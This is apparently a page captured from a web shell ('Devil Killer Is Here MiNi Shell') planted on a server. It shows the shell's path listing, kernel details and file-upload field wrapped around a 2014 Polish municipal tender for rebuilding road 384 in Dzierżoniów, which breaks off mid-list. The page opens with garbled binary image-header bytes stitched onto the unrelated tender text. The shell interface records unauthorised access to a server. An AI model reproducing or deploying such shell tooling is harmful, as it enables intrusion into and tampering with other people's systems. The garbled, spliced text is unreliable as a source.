JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140811/173141-N-2014.html

<p class="kh_header"><b>Dzierżoniów: Część I zamówienia: Wykonanie robót budowlanych w branży drogowej, związanych  z realizacją zadania pn.: Przebudowa ul. Bielawskiej i ul. Batalionów Chłopskich        (droga nr 384) od ronda Żołnierzy Wyklętych do mostu w m. Dzierżoniów.
Część II zamówienia: Wykonanie robót budowlanych w branży elektrycznej, związanych z realizacją zadania pn.: Przebudowa ul. Bielawskiej i ul. Batalionów Chłopskich (droga nr 384) od ronda Żołnierzy Wyklętych do mostu w m. Dzierżoniów.</b><br>
<b>Numer ogłoszenia: 173141 - 2014; data zamieszczenia: 11.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dzierżoniów , Rynek 1, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 74 6450800, faks 74 6450801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzierzoniow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część I zamówienia: Wykonanie robót budowlanych w branży drogowej, związanych  z realizacją zadania pn.: Przebudowa ul. Bielawskiej i ul. Batalionów Chłopskich        (droga nr 384) od ronda Żołnierzy Wyklętych do mostu w m. Dzierżoniów.
Część II zamówienia: Wykonanie robót budowlanych w branży elektrycznej, związanych z realizacją zadania pn.: Przebudowa ul. Bielawskiej i ul. Batalionów Chłopskich (droga nr 384) od ronda Żołnierzy Wyklętych do mostu w m. Dzierżoniów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamawiający dopuszcza składanie ofert częściowych - ilość części 2.
2.	Niniejsze zamówienie składa się z n/w części:
1)	 Część I - Wykonanie robót budowlanych w branży drogowej, związanych z realizacją zadania pn.: Przebudowa ul. Bielawskiej i ul. Batalionów Chłopskich (droga nr 384) od ronda Żołnierzy Wyklętych do mostu w m. Dzierżoniów.
2)	 Część II - Wykonanie robót budowlanych w branży elektrycznej, związanych z realizacją zadania pn.: Przebudowa ul. Bielawskiej i ul. Batalionów Chłopskich (droga nr 384) od ronda Żołnierzy Wyklętych do mostu w m. Dzierżoniów.
3.	Opis przedmiotu zamówienia dla części I:
1)	Przedmiot zamówienia obejmuje następujące roboty: 
a.	Wykonanie przebudowy odcinka drogi na długości 669,5m w tym na odcinku 349m przewidziano całkowitą wymianę konstrukcji, natomiast na pozostałym odcinku 320,5m przewidziano zastosowanie technologii MCE,
b.	Ułożenie na całym odcinku przebudowywanych ulic warstwy ścieralnej z masy mineralno-asfaltowej SMA 0/11 mm gr. 4cm
c.	Wymianę krawężników na nowe betonowe 20x30cm,
d.	Wymianę obrzeży chodnikowych,
e.	 Wykonanie wysp rozdzielających w ciągu przebudowywanej ulicy,
f.	Wykonanie nowej konstrukcji i nawierzchni chodników i ścieżki rowerowej wraz  z montażem balustrad wzdłuż chodnika,
g.	Dostosowanie istniejących zjazdów do nowego poziomu jezdni,
h.	Odtworzenie terenów zielonych wraz z usunięciem kolidującego drzewostanu i nasadzeń zielonych (żywopłotu),
i.	Wprowadzenie czasowej i stałej organizacji ruchu.

W branży instalacyjnej:
a.	Wymianę istniejących wpustów deszczowych na nowe,
b.	Dobudowanie nowego odcinka odwodnienia liniowego,
c.	Montaż nowych pierścieni fundamentowych i płyt odciążających na wszystkich studniach deszczowych i sanitarnych wraz z wymianą włazów na nowe,
d.	Odtworzenie zagruzowanych i zniszczonych wpustów deszczowych.

2)	Wykonawca, oprócz obowiązków wynikających z ust. 1, zobowiązuje się do:
1)	przejęcia terenu budowy, jego zabezpieczenia i należytego utrzymania, 
2)	zapewnienia dojść i dojazdów do posesji zlokalizowanych w obrębie inwestycji,
3)	organizacji zaplecza budowy oraz pomieszczeń socjalno-sanitarnych dla pracowników,
4)	udostępnienia terenu budowy dla wykonawcy robót elektrycznych i właścicieli sieci, celem realizacji przez nich robót w zakresie uzbrojenia terenu dotyczącego ich sieci, planowana jest m.in. wymiana sieci wodociągowej, gazowej i cieplnej,
5)	wystąpienia do gestorów sieci o protokolarne przekazanie urządzeń na czas prowadzenia robót, a po zakończeniu prac protokolarne przekazanie ich właścicielom,
6)	zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę,
7)	wyczyszczenia nawierzchni przyległych dróg w przypadku nawożenia błota z terenu budowy na kołach maszyn, samochodów i innych urządzeń technicznych,
8)	uporządkowania terenu budowy i terenu przyległego po zakończeniu robót,
9)	wywozu materiału i gruzu z rozbiórki na składowisko odpadów,
10)	oczyszczenie i przekazanie Zamawiającemu kostki kamiennej pochodzącej z rozbiórki wraz przetransportowaniem jej w miejsce wskazane przez zamawiającego na terenie miasta Dzierżoniowa,  
11)	wywozu pochodzących z rozbiórki mas mineralno-bitumicznych i ich utylizacji,
12)	obsługi geodezyjnej w trakcie realizacji robót budowlanych, jak i do wykonania pomiaru geodezyjnego powykonawczego dostarczonego również w formie elektronicznej na CD (skan sekcji mapy rozdzielczej 300DPJ i formacie TIF), 
13)	realizacji i poniesienia wszelkich kosztów związanych z wypełnieniem wszystkich zobowiązań wynikających z decyzji, uzgodnień,
14)	wykonania badań i pomiarów w czasie wykonywania robót budowlanych oraz badań odbiorczych zgodnie ze specyfikacją techniczną wykonania i odbioru robót budowlanych,
15)	wykonania Planu Bezpieczeństwa i Ochrony Zdrowia,
16)	przedłożenia Zamawiającemu w dniu podpisania umowy oświadczenia, że będzie prowadził ewidencję wytwarzanych odpadów i będzie gospodarował nimi zgodnie z ustawą o odpadach D.U z 2013 poz. 21 z póź. zm. 
17)	 dostarczenia Zamawiającemu oświadczenia kierownika budowy o przeszkoleniu w zakresie BHP na stanowisku pracy pracowników zatrudnionych przy wykonywaniu robót związanych z realizacją przedmiotowego zamówienia w terminie 30 dni od daty przekazania placu budowy,
18)	dostarczenia, przed wbudowaniem, recepty na masę celem jej zatwierdzenia przez Zamawiającego; w przypadku wbudowania materiału bez stosownej akceptacji, Zamawiający nie dokona zapłaty za jej wbudowanie,
19)	przekazania Zamawiającemu oświadczeń o podjęciu obowiązków przez kierownika budowy i kierownika robót sanitarnych w terminie 3 dni od daty podpisania umowy, 
20)	uczestnictwa kierownika budowy w cotygodniowych radach budowy, na których m.in. będzie kontrolowane stosowanie wymogów związanych z ochroną środowiska i BHP; informacyjnie podaje się, że Urząd wdrożył normę m.in. środowiskową PN-EN-ISO 14001:2005 oraz  BHP PN-N-18001:2004.  

3) Terminy i wartości wykonania przedmiotu zamówienia, tj. poszczególnych kategorii robót, wynikać będą z harmonogramu rzeczowo-finansowego realizacji robót budowlanych zatwierdzonego przez Zamawiającego. Harmonogram, z podziałem na etapy, należy wykonać zgodnie z zapisami §4 ust. 2 w ramach poszczególnych kategorii robót oraz przedłożyć Zamawiającemu nie później niż w ciągu 10 dni od dnia podpisania umowy. Harmonogram podlega zatwierdzeniu przez Zamawiającego. Zamawiający ma prawo zakwestionować wartość poszczególnych kategorii robót w przypadku, gdy w sposób rażący będzie naruszona proporcja pomiędzy nimi. W takiej sytuacji Zamawiający odmówi zatwierdzenia harmonogramu. W przypadku wystąpienia powyższej sytuacji oraz innych błędów w harmonogramie Wykonawca zobowiązany jest do ich poprawienia w terminie 3 dni od wezwania Zamawiającego. Cena ryczałtowa brutto przedmiotu zamówienia nie może ulec zmianie.   

4) Wykonawca w przedmiotowym harmonogramie wskaże wartość do wykonania w 2014r. robót budowlanych na kwotę nie większą niż 1 500 000,00 zł brutto. Zmiana tej wartości może nastąpić po uzgodnieniu z Zamawiającym.

5) W przypadku, gdy w projektach budowlanych i wykonawczych oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych, pod warunkiem, że zagwarantują one realizację robót w zgodzie z Prawem budowlanym i odpowiednimi normami, zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w w/w dokumentacji oraz zostaną one wcześniej zaakceptowane przez Zamawiającego. Zamawiający dopuszcza możliwość wykonania przedmiotu zamówienia z innymi materiałami i urządzeniami równoważnymi, a za ofertę równoważną Zamawiający uzna przyjęcie parametrów technicznych pod warunkiem, że materiały i urządzenia oferowane przez Wykonawcę jako równoważne spełnią wymagania określone przez Zamawiającego w SIWZ, projektach budowlanych i wykonawczych oraz specyfikacjach  technicznych wykonania i odbioru robót budowlanych. Zamawiający informuje, że podane w projektach budowlanych konkretne propozycje materiałów i urządzeń mają na celu wyłącznie określenie standardu wykonania lub przyjętego rozwiązania i mogą być zastąpione rozwiązaniami równoważnymi nie powodującymi zmiany ilości i jakości wyspecyfikowanych urządzeń i materiałów. Zamawiający dopuszcza rozwiązania równoważne, ale na podstawie art. 30 ust. 5 ustawy  to na Wykonawcy spoczywa obowiązek wykazania na etapie składania ofert, że oferowane przez niego materiały 
i urządzenia spełniają wymagania określone przez Zamawiającego.

4.	Opis przedmiotu zamówienia dla części II:
1)	Przedmiot zamówienia obejmuje następujące roboty: 
a.	Demontaż istniejących słupów oświetlenia wraz z oprawami,
b.	Dostawę i montaż nowych słupów oświetleniowych aluminiowych wraz             z wysięgnikami i oprawami ze źródłami światła typu LED wzdłuż jezdni i na przejściach dla pieszych,
c.	Dostawa i montaż kompletnej szafki oświetlenia ulicznego,
d.	Ułożenie nowego doziemnego kabla zasilającego przebudowane oświetlenie uliczne,
e.	Przełożenie kolidujących odcinków sieci energetycznej,
f.	Montaż rur osłonowych na sieci energetycznej.

2)	Wykonawca, oprócz obowiązków wynikających z ust. 1, zobowiązuje się do:
1)	przejęcia terenu budowy, jego zabezpieczenia i należytego utrzymania, 
2)	zapewnienia dojść i dojazdów do posesji zlokalizowanych w obrębie inwestycji,
3)	organizacji zaplecza budowy oraz pomieszczeń socjalno-sanitarnych dla pracowników,
4)	zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę,
5)	wyczyszczenia nawierzchni przyległych dróg w przypadku nawożenia błota z terenu budowy na kołach maszyn, samochodów i innych urządzeń technicznych,
6)	uporządkowania terenu budowy i terenu przyległego po zakończeniu robót,
7)	wywozu materiału i gruzu z rozbiórki na składowisko odpadów,
8)	wywozu pochodzących z rozbiórki mas mineralno-bitumicznych i ich utylizacji,
9)	obsługi geodezyjnej w trakcie realizacji robót budowlanych, jak i do wykonania pomiaru geodezyjnego powykonawczego dostarczonego również w formie elektronicznej na CD (skan sekcji mapy rozdzielczej 300DPJ i formacie TIF), 
10)	realizacji i poniesienia wszelkich kosztów związanych z wypełnieniem wszystkich zobowiązań wynikających z decyzji, uzgodnień,
11)	wykonania badań i pomiarów w czasie wykonywania robót budowlanych oraz badań odbiorczych zgodnie ze specyfikacją techniczną wykonania i odbioru robót budowlanych,
12)	przekazania Zamawiającemu zdemontowanych opraw oświetlenia drogowego oraz słupów oświetleniowych wraz z przetransportowaniem ich w miejsce wskazane przez zamawiającego na terenie miasta Dzierżoniowa.  
13)	wykonania Planu Bezpieczeństwa i Ochrony Zdrowia,
14)	przedłożenia Zamawiającemu w dniu podpisania umowy oświadczenia, że będzie prowadził ewidencję wytwarzanych odpadów i będzie gospodarował nimi zgodnie z ustawą o odpadach D.U z 2013 poz. 21 z póź. zm. 
15)	 dostarczenia Zamawiającemu oświadczenia kierownika budowy o przeszkoleniu w zakresie BHP na stanowisku pracy pracowników zatrudnionych przy wykonywaniu robót związanych z realizacją przedmiotowego zamówienia w terminie 30 dni od daty przekazania placu budowy,
16)	przekazania Zamawiającemu oświadczeń o podjęciu obowiązków przez kierownika budowy w terminie 3 dni od daty podpisania umowy, 
17)	uczestnictwa kierownika budowy w cotygodniowych radach budowy, na których m.in. będzie kontrolowane stosowanie wymogów związanych z ochroną środowiska i BHP; informacyjnie podaje się, że Urząd wdrożył normę m.in. środowiskową PN-EN-ISO 14001:2005 oraz  BHP PN-N-18001:2004.  

3) Terminy i wartości wykonania przedmiotu zamówienia, tj. poszczególnych kategorii robót, wynikać będą z harmonogramu rzeczowo-finansowego realizacji robót budowlanych zatwierdzonego przez Zamawiającego. Harmonogram, z podziałem na etapy, należy wykonać zgodnie z zapisami §4 ust. 2 w ramach poszczególnych kategorii robót oraz przedłożyć Zamawiającemu nie później niż w ciągu 10 dni od dnia podpisania umowy. Harmonogram podlega zatwierdzeniu przez Zamawiającego. Zamawiający ma prawo zakwestionować wartość poszczególnych kategorii robót       w przypadku, gdy w sposób rażący będzie naruszona proporcja pomiędzy nimi. W takiej sytuacji Zamawiający odmówi zatwierdzenia harmonogramu. W przypadku wystąpienia powyższej sytuacji oraz innych błędów w harmonogramie Wykonawca zobowiązany jest do ich poprawienia w terminie 3 dni od wezwania Zamawiającego. Cena ryczałtowa brutto przedmiotu zamówienia nie może ulec zmianie.   

4) Wykonawca w przedmiotowym harmonogramie wskaże wartość do wykonania w 2014r. robót budowlanych na kwotę nie większą niż 100 000,00 zł brutto. Zmiana tej wartości może nastąpić po uzgodnieniu z Zamawiającym.

5) W przypadku, gdy w projektach budowlanych i wykonawczych oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych, pod warunkiem, że zagwarantują one realizację robót w zgodzie z Prawem budowlanym i odpowiednimi normami, zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w w/w dokumentacji oraz zostaną one wcześniej zaakceptowane przez Zamawiającego. Zamawiający dopuszcza możliwość wykonania przedmiotu zamówienia z innymi materiałami i urządzeniami równoważnymi, a za ofertę równoważną Zamawiający uzna przyjęcie parametrów technicznych pod warunkiem, że materiały i urządzenia oferowane przez Wykonawcę jako równoważne spełnią wymagania określone przez Zamawiającego w SIWZ, projektach budowlanych i wykonawczych oraz specyfikacjach  technicznych wykonania i odbioru robót budowlanych. Zamawiający informuje, że podane w projektach budowlanych konkretne propozycje materiałów i urządzeń mają na celu wyłącznie określenie standardu wykonania lub przyjętego rozwiązania i mogą być zastąpione rozwiązaniami równoważnymi nie powodującymi zmiany ilości i jakości wyspecyfikowanych urządzeń i materiałów. Zamawiający dopuszcza rozwiązania równoważne, ale na podstawie art. 30 ust. 5 ustawy  to na Wykonawcy spoczywa obowiązek wykazania na etapie składania ofert, że oferowane przez niego materiały 
i urządzenia spełniają wymagania określone przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.24.00-6, 45.22.20.00-9, 45.11.10.00-8, 45.23.14.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I zamówienia:
wykazać w załączniku nr 4 do SIWZ roboty budowlane wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączyć dowody dotyczące wykonania:
a) min. 3 robót na powierzchni  minimum 6000 m2 każda z robót w zakresie budowy, przebudowy, remontu dróg o nawierzchni z betonu asfaltowego lub mas mineralno-asfaltowej SMA;
b) min. 3 robót na powierzchni  minimum 1500 m2 każda z robót w zakresie budowy, przebudowy, remontu dróg, chodników, parkingów o nawierzchni z kostki betonowej;
określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.
Dla części II zamówienia:
wykazać w załączniku nr 12 do SIWZ roboty budowlane wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączyć dowody dotyczące wykonania:
min. 2 robót na odcinku o długości min. 500 m każda z robót w zakresie budowy, przebudowy, remontu oświetlenia ulicznego; określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I zamówienia:
wykazać w załączniku nr 5 do SIWZ osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za kierowanie robotami budowlanymi:
a) w specjalności drogowej;
b) w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych;
wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia                i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami oraz złożenie oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - poprzez wypełnienie i podpisanie załącznika nr 5 do SIWZ.
Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.

Dla części II zamówienia:
wykazać w załączniku nr 13 do SIWZ osobę, które będzie uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnej za kierowanie robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych wraz z informacjami na temat jej kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie do dysponowania tą osobą oraz złożenie oświadczenia, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia - poprzez wypełnienie i podpisanie załącznika nr 13 do SIWZ. 
Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość wprowadzenia zmian umowy:Dotyczy wszystkich części zamówienia.
1). W zakresie terminu i wynagrodzenia:
a) w przypadku błędów lub braków projektowych (z winy projektanta lub nie) kiedy jest konieczna zmiana technologii wykonania robót budowlanych bądź wykonania zamówień dodatkowych warunkujących wykonanie zamówienia podstawowego, by obiekt mógł spełniać swoje przeznaczenie;
b) z powodu działania okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewiedzieć           w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
c) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.

2). W przypadku wystąpienia robót zamiennych dopuszcza się zmianę umowy
 w zakresie terminu wykonania, wynagrodzenia w sytuacji gdy wystąpi:
a) podniesienie bezpieczeństwa;
